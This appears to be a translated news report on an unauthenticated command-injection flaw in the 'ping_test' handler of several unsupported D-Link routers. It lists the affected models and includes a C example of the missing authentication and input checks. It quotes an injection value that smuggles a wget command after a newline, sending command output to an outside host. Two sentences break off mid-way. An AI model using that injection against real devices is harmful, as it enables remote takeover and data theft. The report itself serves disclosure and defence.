In D-Link wireless routers
Apparently, as the firmware developers intended it, the "ping_test" call should be executed only after authentication, but in reality it is invoked in any case, whether or not the user has logged in to the web interface. In particular, when the "action=ping_test" parameter is passed, the script redirects to the authentication page but at the same time performs the action associated with ping_test. To execute code, a second vulnerability in ping_test itself was used: it calls the ping utility without properly validating the IP address submitted for testing. For example, to call the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
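The two missing checks described above, as an added example written for this page and not taken from D-Link's firmware: the handler refuses unauthenticated requests before doing any work, accepts only a strict IPv4 literal, and starts ping without a shell. The names `handle_ping_test` and `ping_target_ok` and the `/bin/ping` path are assumptions.

```c
#include <arpa/inet.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Percent-decode a form value; -1 on a bad escape, an encoded NUL, or overflow. */
static int url_decode(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    for (; *in; in++) {
        char c = *in;
        if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2])) return -1;
            char hex[3] = { in[1], in[2], '\0' };
            c = (char)strtol(hex, NULL, 16);
            in += 2;
        }
        if (c == '\0' || o + 1 >= outsz) return -1;
        out[o++] = c;
    }
    out[o] = '\0';
    return 0;
}

/* Accept the value only if, once decoded, it is exactly one IPv4 dotted quad. */
int ping_target_ok(const char *raw, char *ip, size_t ipsz) {
    struct in_addr a;
    return url_decode(raw, ip, ipsz) == 0 && inet_pton(AF_INET, ip, &a) == 1;
}

/* Hypothetical handler: the session check comes before the action, not after it. */
int handle_ping_test(int authenticated, const char *raw_ipaddr) {
    char ip[INET_ADDRSTRLEN];
    if (!authenticated) return -1;            /* refuse outright, not redirect-and-run */
    if (!ping_target_ok(raw_ipaddr, ip, sizeof ip)) return -2;
    pid_t pid = fork();
    if (pid < 0) return -3;
    if (pid == 0) {
        char *argv[] = { "ping", "-c", "1", ip, NULL };
        execv("/bin/ping", argv);             /* argv array, no shell; path is assumed */
        _exit(127);
    }
    int st;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st)) return -3;
    return WEXITSTATUS(st);
}

int main(void) {  /* constructed inputs: unauthenticated call, then a %0a-separated value */
    return !(handle_ping_test(0, "127.0.0.1") == -1 && handle_ping_test(1, "1.1.1.1%0aid") == -2);
}
```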
The presence of the vulnerability has been officially confirmed in the following models:
- DIR-655 with firmware 3.02b05 or later;
- DIR-866L with firmware 1.03b04 or later;
- DIR-1565 with firmware 1.01 or later;
- DIR-652 (no information about the affected firmware versions is provided).
The support period for these models has already expired, so D-Link
It later turned out that the vulnerability was also
Source: opennet.ru